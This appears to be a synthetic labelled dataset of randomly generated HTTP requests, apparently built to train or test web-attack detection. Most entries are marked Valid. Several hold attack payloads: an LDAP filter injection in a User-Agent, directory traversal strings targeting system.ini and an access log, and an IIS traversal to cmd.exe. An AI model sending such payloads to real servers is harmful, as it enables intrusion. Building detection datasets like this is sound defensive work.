Warning: 736 www.eLwneah.shtml "l38ruhse" 
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 935727491848892765
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 22431
Start - Id: 3568
class: Valid
GET /u8Q8s2ae2ribp/tBShVo-tX1/Re/gVty9YWbcMT/QCxSjsv-s/p9-Awp/6PWpdKt71J/iL2LUIxELxziVi/cetie/rdyA2gZZK@S56Lapd1.cgi?QI.5k5eJ5=%2F8&Bsnyi=+rsv&GTDji3dtg4-=xed.nZB&tmcsdimznz=ig2Kb&diecNittreetMni=4004&unRWY5RopenrPprocessing-instructionI=TtAeYalni6utNtor&kinfYnnodfuN5zV=9auohhtcn&qawbodygq=ers0d9ee7Sc&tb=aRzz&trenyB=90563&IRen8meiA=o%29&es1o=axlbtinaRhoak3A HTTP/1.0
Host: www.oot2e.com
Connection: close
Accept: application/x-tar, application/*, text/xml
Accept-Charset: iso-8859-15;q=0.9, us-ascii;q=0.0, cp-936;q=0.4, iso-8859-8-i;q=0.0, iso-8859-9;q=0.7
Accept-Encoding: 
Accept-Language: s-kloe6yte;q=0.3, kwoe2-e;q=0.8, csaeE-tqtv;q=0.4
Cache-Control: no-store
Client-ip: 10.4.122.248
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="626"
Date: Mon, 25 Jun 07 23:48:11 GMT
ETag: W/"RqOfUIrMkFeqervFbqid"
Expect: re5ottt
From: yHte1@lubebreIb.biz
If-Modified-Since: Wed, 24 Dec 08 06:15:12 GMT
If-Unmodified-Since: Thu, 29 Apr 04 20:28:11 UTC
If-Match: "pdYvsyT3WsWEj3JxJ"
If-None-Match: *
If-Range: *
Max-Forwards: 13
MIME-Version: 5.8
Pragma: te=qhaiE
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: dnjdkN ftenhj=ev97i
Range: 285-321592,-0,1-98
Referer: http://eieirhu.de/iahsse/8a4b/nlnnxhie/ictdor/e4jawt.swf
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/2.8 (compatible; Konqueror/7.2; SunOS sun4u; zstrYi0oc)
UA-CPU: MIPS
UA-Disp: 754,026,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 047x6463
Via: HTTP/7.3 175.64.100.0
Transfer-Encoding: compress
Upgrade: h7ie/3.3, LnC/5.0, hAteV/9.3, nrgX/0.9, 4yoeea/8.1
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3568
Start - Id: 20822
class: Valid
GET /tMVgcrm/durtuSietgt/gy/yinputV6IJ4DHnin/lu7OiGQf0w7FNO6/Ihinafow1pTw/bxtsCZUdmvW/WpTzkQlzupdatebin/uKjakDOwsyBer/lAXu7.PgWRm/MRadmin/4hxbNmGQGM8.jsp?ensitA=oithrgaWoajo&hZ=tt0ralimanaxlsydt&0Z2U3B6R@=tlIi&uxm0EheDab=nmYenogndniw8ooae&bentraauyadthQ=htrcp%3Dx HTTP/1.0
Host: 13.113.172.9:3528
Connection: jde4ore
Accept: image/png;q=0.5, application/*;q=0.3
Accept-Charset: iso-8859-9, koi8-r, iso-2022-jp, windows-1250;q=0.2, utf-8
Accept-Encoding: compress;q=0.7, gzip;q=0.9, deflate;q=0.7
Accept-Language: eE2-asofrsnr;q=0.0, aree-iota27e, eerlsLtf-et
Cache-Control: only-if-cached
Client-ip: 69.221.101.250
Cookie: capee=;w
Cookie2: $Version="003"
Date: Wed, 13 Apr 05 06:56:37 UTC
ETag: W/"DeYc6lmQl-YJGqzsxV"
Expect: nmao=teaea;oidrhia
From: itbAy3@24cao.it
If-Modified-Since: Fri, 16 Jun 06 05:20:37 UTC
If-Unmodified-Since: Wed, 28 Apr 10 17:49:01 UTC
If-Match: "8fQLuMaf_SkmSuKJXF"
If-None-Match: *
If-Range: Thu, 14 Dec 06 23:54:51 CET
Max-Forwards: 4812
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic ZXFubDpHQW5tRQ==
Authorization: Basic eWU4RmV0OnlhdmVmSQ==
Range: 05030-356,-016,3009-
Referer: /ez8rI6/Nlo7/roq4thai/iiz3e/m0lm.mdb
TE: trailers,deflate
Trailer: Trailer
User-Agent: s9Deu@HUWv http://www.lsord.fr
UA-CPU: PowerPC
UA-Disp: 7276,7233,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3856x4150
Via: zpwiad/5.1 www.honvnie.shtml, neHk/6.9 113.8.215.192
Transfer-Encoding: identity
Upgrade: ehs/7.1, th3/2.3
Warning: 765 186.65.136.9 "kes3cga1t4maesoo" "Mon, 23 Nov 09 01:50:54 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20822
Start - Id: 1320
class: Valid
GET /D.F5Yrgr.xp_PgB_s.cfm? HTTP/1.0
Host: 237.200.169.248
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.2, iso-8859-2;q=0.2, x-mac-japanese;q=0.6, iso-8859-4, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 58.67.184.51
Cookie: obQnFF=otoehwjt6noapced;a8eEagc=QsPd;aelsudaeCbm11Yu=06380211;aotqscissn=88
Cookie2: $Version="16"
Date: Mon, 06 Oct 08 14:08:55 UTC
ETag: "cdzAjY0NJ4jEVrTNe"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Fri, 06 Feb 09 23:10:09 CET
If-Match: "nm3vm9xdMqFqhSC36KB"
If-None-Match: "of_XpcshRNOdr5qOX98"
If-Range: *
Max-Forwards: 1
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic aWd0ZGVzbTpyNGlhZQ==
Authorization: os0tte Hhcl=l6orCcng
Range: -216
Referer: /iees.php4
TE: deflate;q=0.5,gzip;q=0.3,chunked;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (Windows; U; Win 9x 4.7; wv-hs; rv:6.9.8) Gecko/88245495
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 290x591
Via: icv/7.7 190.61.29.93, HTTP/8.7 8.138.127.117, 1.4 www.mt3e.jpeg
Transfer-Encoding: esnisF
Upgrade: t7rs/3.9, wsOC/1.9, elcLbb/7.5, yutxee/3.6, sz6enA/6.2
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 6191285179418731
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1320
Start - Id: 37371
class: LdapInjection
GET /gnHarglhoe/0eoesgdiDe/hutnaHlcHheo/r5o3YLLmLQ8Aq3w6u2i/tee3fkvmTgwo.png?rNplotThs3no=9633569&to7netaywt2shg=%5B+veinlli6FeO+ssystem&OeoniiluxyVt=9_pbLxIw HTTP/1.0
Host: 5.103.36.21
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad;q=0.3, x-mac-icelandic, koi8
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=1732
Client-ip: 115.169.125.19
Cookie: no=dAgFJaNoKYp;etcGA55vX0=8esJtservices 64hEpxtejpv;eem=o0Da>likesk8af;tssadXdtOEdav=852301472
Cookie2: $Version="0"
Date: Wed, 03 Dec 08 22:18:49 CET
Expect: 100-continue
From: mBdt@z8nsodsh.cz
If-Modified-Since: Sat, 25 Oct 08 17:31:46 GMT
If-Unmodified-Since: Fri, 04 Jun 04 18:03:41 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Jun 07 19:17:17 CET
Max-Forwards: 556
MIME-Version: 0.9
Pragma: ah='l6u4Ee6H'
Authorization: NTLM NmNyMHlrYnd0YXRzbGJhaGx5bGhrcGQ5ZGRyazIwZW1lVGtlOGJrTG9yZWV0d3k=
Range: 035401-,4-6217,51-512
Referer: /6aXajsr/susgaal/fI94ean.mpeg
TE: gzip,chunked
Trailer: Trailer
User-Agent: )  (  |(   cn=*o    'brien*    )(mail  =*o 'brien*   ) 
UA-CPU: x86
UA-OS: WinNT
Via: HTTP/6.6 165.122.208.20, 3.2 www.olgwl.tiff, eole/2.8 www.titknNb.js
Transfer-Encoding: identity
X-Forwarded-For: 170.106.4.226
----: --------------

null

End - Id: 37371
Start - Id: 6925
class: Valid
POST /eUMW2AYXBE/ayphelxytovbrtdbe3d/SiltIse4fvorBo211/Q7BW7YlTedFRformYx/eaonbln.shtml? HTTP/1.0
Content-Length: 94
Content-Language: d4e1tdO1,kdwg21au
Content-Encoding: gzip
Content-Location: http://aare.uk/uvTieAh/bwlanaI/smstansj.mdb
Content-MD5: dG9ucm1zZGVmZHRIbm51bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Oct 06 04:06:55 UTC
Last-Modified: Thu, 05 Jun 08 18:03:44 UTC
Host: www.nt3ir.uk
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ye3ulimh-2hhj, begn-htvs, 1tsznta-ny6u;q=0.8, oa4wsane-enpZn
Cache-Control: only-if-cached
Client-ip: 238.62.141.37
Cookie: ce=a h
Cookie2: $Version="95"
Date: Sun, 09 May 04 19:42:32 CET
ETag: "F0InPzND1SA8bpq5cJPP"
Expect: hIio
From: yo9el@iae0gwfot.st
If-Modified-Since: Tue, 20 Feb 07 17:25:06 GMT
If-Unmodified-Since: Mon, 24 May 04 22:25:00 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 22 Oct 07 22:29:50 UTC
Max-Forwards: 01
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: obntn ETroq=muk2
Authorization: Basic bGlkdDpzYVRvNA==
Range: -35,310954-4,-65030
Referer: /Our1/sahhnx/n2fte3L/sDh0.pdf
TE: chunked;q=0.7,deflate;q=0.0,chunked;q=0.5
Trailer: From
User-Agent: f7il/2.2
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9121x8354
Via: er1l99/8.1 214.61.47.53, FTP/5.8 125.123.19.144, FTP/4.4 100.195.15.15:3275
Transfer-Encoding: gzip
Upgrade: uppMei/3.0
Warning: 403 www.7lhrdW5D.png:79936 "GNhj" "Fri, 05 Jun 09 03:22:17 GMT"
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 311516057491
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

en0roeta=iframe&zehvsnlla=00&zmIAA3c=pTabi0osTms&fWe=12106&gnagod=2&uNGsdoe=sCldli<&sn84v=17

End - Id: 6925
Start - Id: 30888
class: Valid
GET /sg/ogasl86ayutgotwny/m05ebpsIetna8ootwxtM/b_HtVkanMV6M_Z1@YhJ/eK.aKFlPD.html? HTTP/1.0
Host: 245.32.147.17:80
Connection: close
Accept: image/*
Accept-Charset: x-mac-roman;q=0.0
Accept-Encoding: *
Accept-Language: jAti-enec6sar, Uatiaotu-huaTlsfe;q=0.4, otode-5so;q=0.0, teorn2ee-Uegr;q=0.5, s-tnonf
Cache-Control: no-cache
Client-ip: 17.214.18.38
Cookie: tetmhhaae=IkiJ%;erm1phfenoa4ir=5708283
Cookie2: $Version="2"
Date: Mon, 28 Nov 05 04:44:58 UTC
ETag: W/"rQPx.FZ4dJp280hlby"
Expect: 100-continue
From: amHxrsrn@9as8ijaavb.it
If-Modified-Since: Thu, 10 Jan 08 09:19:35 GMT
If-Unmodified-Since: Fri, 05 Jan 07 10:40:46 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Nov 07 05:45:05 UTC
Max-Forwards: 736
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ihtSuR 1erotrKa=8edlbrl
Authorization: tthi eSEuol=suNu
Range: 4-
Referer: http://fjrni.biz/nxic/nN4i3Sa/9imgsS/9eedu9.zip
TE: gzip,chunked;q=0.9,chunked
Trailer: Host
User-Agent: 8ioPifaSantsi2ed
UA-CPU: MIPS
UA-Disp: 830,625,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 572x8066
Via: FTP/4.7 237.0.49.154, tpf/8.2 www.thcTT.gif
Transfer-Encoding: compress
Upgrade: spiie/8.9, apg2sc/2.7, exuI/4.7, ndd/9.7, fnvse/6.9
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 207.136.105.149
X-Serial-Number: 0719551808086
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30888
Start - Id: 4883
class: Valid
PUT /4i/ucyC/boxHWxBEZ9t1LSnKkR/Sns83i/ce6ehLd8foevaedb.png? HTTP/1.0
Content-Length: 229
Content-Language: u6nHl48,ut,aanas
Content-Encoding: compress
Content-Location: http://oaHv.be/wq1ri/amco1s/I4nan/eAOats.php
Content-MD5: bE5rc3NlU2htYUFoZW5zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Oct 07 21:13:25 CET
Last-Modified: Tue, 16 Mar 04 13:31:28 CET
Host: www.aqnl.net
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: alel-E3se;q=0.0, yitSss-t1Am7i, ait-tEgcbru
Cache-Control: min-fresh=7645
Client-ip: 29.17.35.192
Cookie: iBOb=4851420;31fwacueNkndl=;hz0ftp/;elesUKartEu=oGx;n8c=31045;nVoBd5_S@=Ge>letc
Cookie2: $Version="619"
Date: Tue, 13 May 08 09:44:39 GMT
ETag: "dcMVOniXcAScfLf"
Expect: highc=c1eo;nodt1=DeEe
From: itds3@bta1toaaio.be
If-Modified-Since: Wed, 17 Oct 07 14:47:44 CET
If-Unmodified-Since: Fri, 21 Oct 05 20:09:26 GMT
If-Match: *
If-None-Match: *
If-Range: "aOyNGezDFvkoOjf"
Max-Forwards: 79
MIME-Version: 4.1
Pragma: nmif=Awr9coua
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="EDFD4180F86c69C3d2483bde5d417bfa"
Range: -73,-2400
Referer: http://Stie.it/oqp697el/ibxhoy0w/sSwrtsm3.txt
TE: trailers
Trailer: Range
User-Agent: daqmgu. http://www.eaIt.biz
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1672x4809
Via: FTP/9.0 www.exeapsn.tiff, 0.4 www.c6ddVeT.shtml
Transfer-Encoding: deflate
Upgrade: wsry/3.9, n3Lf/9.4, otoco/2.2
Warning: 057 www.e7xShmti.shtml "doelar6lifleayg" "Sat, 14 Jan 06 16:16:51 GMT"
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Oe2a=891&lnMirs1tTim=dsD&stwmrasdf=o]1Zr&8PgOAMCRbetweenbstdinT=223&var.VUeiTQ=8573111461&aaeulnadkcazsk=p@_-D&hrenete=tros&wwgg1=Js&somo1It=07183&bf7Xd-4oYqmh=thnchildd2imthomen&Kbin1r0mail4q.s=e1nelrdyet7leeae&wixg=38099630

End - Id: 4883
Start - Id: 27224
class: Valid
GET /mHLO@QpbcL8Qs439tGc1.aspx?eei470eohbF=siajnhnv7denob8ako&nrh=0481443&esrotaesm=elkstdzinzo1r HTTP/1.1
Host: 216.174.155.123
Connection: eNccid
Accept: video/mpeg
Accept-Charset: cp-950, x-mac-hebrew;q=0.1, euc-kr, shift_jis;q=0.2, x-mac-roman
Accept-Encoding: *;q=0.0
Accept-Language: usino-osgj;q=0.9, k-2;q=0.7, eomsYyb5-uttbp, 7c-lwn;q=0.8
Cache-Control: min-fresh=2656
Client-ip: 118.249.27.115
Cookie: ssgto5w=6inbutnc;xoNbu0Mhttp13_h=bkJ_J_3;ld=>mhs/formH0i$etoa$3&l;hfli=itnwcee
Cookie2: $Version="0"
Date: Mon, 05 Mar 07 19:41:42 UTC
ETag: W/"uuyM-6FilYWqa@Bq"
Expect: 100-continue
From: swk0qTsy@7ydemyi.com
If-Modified-Since: Tue, 02 Mar 04 16:01:22 CET
If-Unmodified-Since: Mon, 02 May 05 02:25:12 CET
If-Match: "BKrLZFCSf-1KwBt-"
If-None-Match: *
If-Range: Sat, 16 Feb 08 13:54:36 GMT
Max-Forwards: 86
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM c3Jja3ZsZDJsbGF3aTAxYzdydGUwb2hlbmxjMjRtY3Roc3JUdW8=
Authorization: NTLM aGVIbjBzczRld29qNVRzZGVpZW1lc1NuN3VhaGdrZWk=
Range: -916,-3,-01
Referer: /e2rvimDi/mie4/3gve/bxir/eennad.php4
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 2.5; te-iH; rv:9.5.6) Gecko/32811507
UA-CPU: 68000
UA-Disp: 451,9242,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: FTP/0.5 www.eluen6.jpeg, HTTP/6.7 145.65.228.189:0590, 7.8 23.120.164.9
Transfer-Encoding: deflate
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 294 125.68.204.148 "qsD6esueacnn6pawXhhU" 
X-Forwarded-For: 20.1.206.31
X-Serial-Number: 907247306873
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27224
Start - Id: 45291
class: PathTransversal
GET /tSll1GtL0/w9hRvR7Px/Z62BdZCJftpC7tc/m_j4_K/gteh/yrRjzrl5fNx1W6k.kjE.js? HTTP/1.0
Host: www.halis7ep.st
Connection: ot6oO
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: ..\..\..\..\..\..\..\..\..\WINNT\system.ini
Accept-Language: *;q=0.5
Cache-Control: no-store
Date: Fri, 01 Sep 06 06:36:11 UTC
ETag: "RUC6_eMpGbZsMGv2eAP"
Expect: 100-continue
If-Unmodified-Since: Thu, 09 Nov 06 08:02:12 CET
If-Match: *
If-None-Match: "vy26I@I4OMlfY.MxNNn"
If-Range: "hyENtioC0J02xo6XEf"
Max-Forwards: 65
Pragma: rrc2Oh='hnfEae6'
Referer: http://tnei.gov/reJWdiHb/wmlM/o8yrXi74/ee1gtlae/b7lrjra4.tar
TE: trailers,chunked,trailers
User-Agent: oaudect/6.2.0
Via: HTTP/2.7 www.woihti.htm
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45291
Start - Id: 23027
class: Valid
GET /eTNDbwi6B1.asp?dhoHetirpptmb=n9o HTTP/1.1
Host: 242.132.211.95
Connection: keep-alive
Accept: text/*;q=0.5, audio/basic
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.0, gzip;q=0.3, deflate
Accept-Language: rTet-y, ihod82fS-e;q=0.9, jdwa8-e6ehIca7, ect4m-hnex;q=0.7
Cache-Control: max-stale=61449
Client-ip: 214.111.249.215
Cookie: nrw9=rXpCbv
Cookie2: $Version="13"
Date: Thu, 19 Jul 07 02:41:16 GMT
ETag: "inE2WQHHY8lD@_@or."
Expect: nmn9tvua=uteesstN;Sc2l=slpf1
From: h4onipb@tioEEuhai.ch
If-Modified-Since: Sun, 21 Mar 10 15:32:18 GMT
If-Unmodified-Since: Fri, 06 Feb 04 16:00:06 UTC
If-Match: *
If-None-Match: "akWT9vI1iwPRcw-W1"
If-Range: Sun, 05 Mar 06 20:09:16 GMT
Max-Forwards: 4374
MIME-Version: 6.7
Pragma: tu=lnttRYd9
Proxy-Authorization: Basic aHN4ZWNubGM6aHplcnBlTHI=
Authorization: Digest uri=http://www.4s2dpdh.it/r2o4/XEhnbM/HHnnBne/hoebuc/w8ogkAan.jsp
Range: -41
Referer: /sjEas/eOgaiwh/qyn22/ftnyeC.mdb
TE: gzip,trailers
Trailer: Accept-Charset
User-Agent: ojntTgneh2po
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6076x9120
Via: 6.4 162.55.244.91, 0.5 www.rxxn3.tiff
Transfer-Encoding: gzip
Upgrade: Tpmp/2.0
Warning: 734 www.Hchqa.tiff:72679 "EgDdamyeocew" "Sat, 20 Nov 04 02:06:36 UTC"
X-Forwarded-For: 253.18.58.174
X-Serial-Number: 794051
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23027
Start - Id: 13334
class: Valid
GET /zosuhhdudrBvseettygm/5JDA/P5rS9g/optAF2bpQRbOs/rxToQhlNGiG.GxTy/9eval/5snvae/ZY3m.H6/atrnala1Eedontd3dae/cbsoeauin8roeu/t8ts0WHod1.tiff?Yoyakk=eanEZhrhe3isa&5tsz6uoraehgm=cljWk&v.phqlrSZF@S=8mafdosbddlcmsa&exec8optMsock_streamYEselectg=906038101&y7yee1linsr=bz2sFb&gtrn=2ri6&la=0091927&ia=t868IMaMe9&GAGexecGR_pJT=31860596&w6=1846529&w9ruda6=365051&t3rtitda1shltle=to%3Be4a%5Dne&8B3XP=idtnglsabcieAtnBsm&ude7yleg=227435552&nljRngwrwl=3028644 HTTP/1.1
Host: www.aieDkqisti.st:0
Connection: keep-alive
Accept: application/x-tar;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 38.58.104.164
Cookie: 9unHpzFM4=29;YkExPaD=eiYaeto;sqohemaU=2300
Cookie2: $Version="712"
Date: Wed, 09 Apr 08 05:49:18 UTC
ETag: W/".yUJODkEXkhnKuu"
Expect: 100-continue
From: qyfmaeSc@eieatsEee.st
If-Modified-Since: Sun, 24 Sep 06 21:36:46 UTC
If-Unmodified-Since: Thu, 18 May 06 21:39:04 CET
If-Match: *
If-None-Match: "TYnLYgy4kjRIXbRbPWV"
If-Range: Mon, 15 Mar 04 12:49:24 UTC
Max-Forwards: 659
MIME-Version: 5.1
Pragma: I=1f1he
Proxy-Authorization: NTLM dG5vWXU2bzVvMm5hdGFoYjFvTGF6aXJhZ3NuYW5VZW9wdGU3
Authorization: Basic Y2xobm4yOmVlaW5tdA==
Range: 30510-65,097-,-5721
Referer: /zhnhBe/bUsepE/idsdtds/csCbip.asp
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 7.9; Re-oi; rv:1.5.3) Gecko/50011293
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 643x366
Via: 2.3 137.246.219.77:7663, HTTP/9.0 www.DhFsieh.html
Transfer-Encoding: deflate
Upgrade: arbqe/0.4, stO/8.7, nMx/4.4, ioMi4D/1.1, oChir/3.9
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 86.238.108.143
X-Serial-Number: 52905795752439402910
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13334
Start - Id: 46036
class: PathTransversal
GET /Gu/stEhersn/dEeTthn/bs/cUGK/ssqsCnoTetpidbgpegs/aa/sEl/DasIeemtaEcre5tea/yN6lsHhtisRytiWgiapr/r4ga.jpeg?OtueieltchT=468088&yoee4=9%28&hJ6mhttpsLsCQ=he HTTP/1.0
Host: www.RAiGi.org:832
Connection: arehl
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: iyN8sOS-rr, bL-rbtose, aatry-bar;q=0.8, aGk-h;q=0.2, hNq-7n
Cache-Control: max-age=1
Client-ip: 62.95.118.93
Cookie: iinatoqy1=);eierehs=Arlinsertm;oehqh=20436595;afehzefx=h"tuki| a"6mriobject
Cookie2: $Version="01"
Date: Wed, 27 Feb 08 18:53:13 GMT
ETag: W/"l-ItnQaJptc0A4EyShE-"
Expect: olLo=ev0eans
If-Modified-Since: Wed, 02 Jan 08 20:49:43 UTC
If-Unmodified-Since: Sun, 20 Aug 06 13:15:45 CET
If-Match: "1DKLAE8Z102@qgZq"
If-None-Match: "@Q-2p3PXvj53esvrCofY"
If-Range: *
Max-Forwards: 3
Pragma: no-cache
Authorization: Basic NWltdW46ZXMybzU5
Range: 96418-,-1,193-
Referer: http://www.qimhe.cz/oeHsOh5/7TCe/itSm/xqie/miIn.pl
Trailer: Accept-Language
User-Agent: ../../../../var/log/access_log%00.html
Via: 2.6 63.146.63.218, FTP/3.9 www.autu.tiff:717
Upgrade: n41se/5.7
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
~~~~~: ~~~~~~~~~~~

null

End - Id: 46036
Start - Id: 16856
class: Valid
GET /oa0teo/crcVnwdexInnsrews8Ee.gif? HTTP/1.1
Host: 36.124.64.178
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale=560
Client-ip: 127.221.48.135
Cookie: orcoba4dce=421;os3o=lfaes1Ni5onmfrdth;esHeullh=2d bl-tlOrio0rt;uiloleetaM=t71ey
Cookie2: $Version="519"
Date: Thu, 27 Jul 06 14:11:40 GMT
ETag: "GUs2waZHtgMqsFgO_q"
Expect: 100-continue
From: sad4d0o@e9nnxnucoh.be
If-Modified-Since: Thu, 18 May 06 08:30:39 CET
If-Unmodified-Since: Sat, 23 Jul 05 04:25:17 CET
If-Match: *
If-None-Match: "JzCNXzj-QFdiCwFra"
If-Range: Sun, 30 Aug 09 17:02:35 UTC
Max-Forwards: 3
MIME-Version: 8.8
Pragma: ahEu9i='yem'
Proxy-Authorization: Basic cHNjaWVyZXE6ZWlvY24=
Authorization: Basic aG9uaHRmOnNucGE=
Range: -2762
Referer: /fkurye.php
TE: trailers
Trailer: Trailer
User-Agent: yc5MijsfatshmOlk
UA-CPU: Sparc
UA-Disp: 199,9704,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8974x063
Via: HTTP/1.8 112.47.233.27, 2myo3l/8.4 230.182.136.85, HTTP/4.9 www.suti.png
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 926077
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16856
Start - Id: 43676
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 101.79.167.50
Connection: close
Accept: application/*, audio/*;q=0.2
Accept-Charset: iso-8859-6, windows-1254, x-mac-cyrillic;q=0.5
Accept-Encoding: deflate;q=0.6
Accept-Language: a-i;q=0.1, wu7-i;q=0.6, eo-hbDxze;q=0.1, 8bf6-gneWli
Cache-Control: min-fresh=3
Client-ip: 123.220.31.165
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Wed, 23 Jun 04 07:13:05 CET
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: l9owie
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "uZEImgwAnn6.GHfE8NC"
If-None-Match: *
If-Range: Sun, 05 Dec 04 01:14:29 GMT
Max-Forwards: 2532
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="gvaaal"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: /03aTCq/irJo8drm/rRhom/eoo5d/2eneii.tar.gz
TE: trailers,chunked
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 2.0; 4a-us; rv:2.6.2) Gecko/11105635
UA-CPU: x86
UA-Pixels: 827x275
Via: FTP/6.3 131.121.137.220
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43676
Start - Id: 49512
class: XPathInjection
